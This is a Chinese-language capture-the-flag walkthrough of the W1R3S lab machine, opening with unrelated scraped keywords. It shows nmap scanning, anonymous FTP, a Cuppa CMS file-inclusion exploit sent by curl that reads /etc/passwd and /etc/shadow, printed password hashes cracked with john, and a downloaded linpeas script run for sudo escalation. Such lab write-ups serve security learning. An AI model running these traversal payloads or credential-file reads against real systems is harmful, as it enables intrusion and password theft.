建设部网站业绩如何录入,duplicator wordpress,需要推广的软件,如何建网站保定特别注明#xff1a;本文章只用于学习交流#xff0c;不可用来从事违法犯罪活动#xff0c;如使用者用来从事违法犯罪行为#xff0c;一切与作者无关。
目录
前言
一、信息收集
二、网页信息的收集
三、提权
总结 前言
思路清晰#xff1a; 1.信息收集#xff0c;…特别注明本文章只用于学习交流不可用来从事违法犯罪活动如使用者用来从事违法犯罪行为一切与作者无关。
目录
前言
一、信息收集
二、网页信息的收集
三、提权
总结 前言
思路清晰 1.信息收集基础的ftp站点没有什么能获取到的 2.基础信息收集对常见站点的爆破和利用都没有有效信息对站点进行爆破得到CMS 3.根据得到CMS搜索可利用的exp或者下载源码审计这里有可利用的exp直接下载利用 4.exp是对于文件包含的渗透php文件包含include()、include_once()、require()、require_once() 5.得到普通用户的webshell常规收集系统信息提权这次不用我们根据扫描出的sudo来提权得到rootshell 一、信息收集
照例扫描内网 扫描到靶机
收集到开放的对应端口有80先访问 我们继续扫描靶机的详细信息 nmap -p- -sV -sS -A -T5 192.168.198.132 信息有点多我们一个一个看先看ftp的 其他的我们要不然就是ssh爆破爆破子目录这些都需要进一步收集信息但是我们再ftp哪里可以看到几个文件。 我们知道系统版本且他有个低权限的Anonymous用户没准可以提权ftp的思路比较清晰所以我们还是先进ftp ftp登录 先把所有文件目录下的文件看下 把文件获取下来
先获取content里面的文件 docs里面的文件 new-employees的文件 我们一个一个查看 for W1R3S.inc
这个不知道是文件还是用户名大概率是个文件
02.txt明显里面是个base64编码的 上面那串值感觉像是hash的密文我们识别一下 识别出来的协议可能性太多了根本没法判断
03.txt也没什么信息就是个图形而已
worktodo.txt和employee-names.txt都有很多信息我们一个一个来 感觉像是俄语或者乌克兰语啥的。。。但是百度识图啥的都出不来
·
这个感觉是用户但现在也没办法直接用ftp能得到信息就这么多接下来要不然就是提权要不然就是继续其他端口的信息收集我们还是尽量收集信息把。。。 二、网页信息的收集 前面我们访问80发现有站点那么我们爆破下站点
内容有点多我们先关注一级目录 有个administrator目录我们直接访问看下
直接给我们跳转到了一个cms平台 这个cms是Cuppa CMS
请教一下谷歌老师 有编号我们继续看内容
这是个php的文件包含的漏洞 我们利用一下
http://192.168.198.132/cuppa/alerts/alertConfigField.php?urlConfig../../../../../../../../../etc/passwd 利用失败?
试了好久playload是这样用
http://192.168.198.132/administrator/alerts/alertConfigField.php?urlConfig../../../../../../../../../etc/passwd 这里看不到文件内容因为我们发送的是get请求我们需要发送post请求去获取
我们用curl命令 curl --data-urlencode urlConfig../../../../../../../../../etc/passwd
http://192.168.198.132/administrator/alerts/alertConfigField.php
前面都是css源码 后面是内容 这里最差可以得到账户信息
我们读取密码肯定是读取shadow
curl --data-urlencode urlConfig../../../../../../../../../etc/shadow
http://192.168.198.132/administrator/alerts/alertConfigField.php 得到三个账户是由密码的那么我们就可以尝试爆破这三个密码因为有ssh root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7::: www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7::: w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7::: 当然这个基本就只能hash碰撞了
我们用john这个工具尝试爆破一下
vim j.txt 直接爆破这个文件 得到两个用户
我们尝试登陆
w1r3s按照我的经验是肯定能登录的 www-data这个用户明显是站点用户可能登录不了但是我们还是尝试一下 登录不了但是有报错信息有版本号和其他信息 三、提权
我们有个shell脚本可以自动化信息收集 想要可以私信我
kali开启8000端口网页 wget获取shell脚本 执行一下 w1r3sW1R3S:~$ chmod x linpeas.sh w1r3sW1R3S:~$ ./linpeas.sh 高亮的都可以利用 我们发现sudo可以利用
直接利用就好了 直接拿到flag 总结
这个靶场很简单主要还是了解一下文件上传
我们再看看这个导致文件包含漏洞的php文件和源码 nano alertConfigField.php 文件包含渗透里面有很多这样的漏洞我们还是需要了解的。 总结 这个靶场比较简单主要是对文件包含漏洞进行了解大家可以多看看文件包含漏洞的文章多复盘多总结祝各位师傅越来越厉害看到这里点个把 特别注明本文章只用于学习交流不可用来从事违法犯罪活动如使用者用来从事违法犯罪行为一切与作者无关。
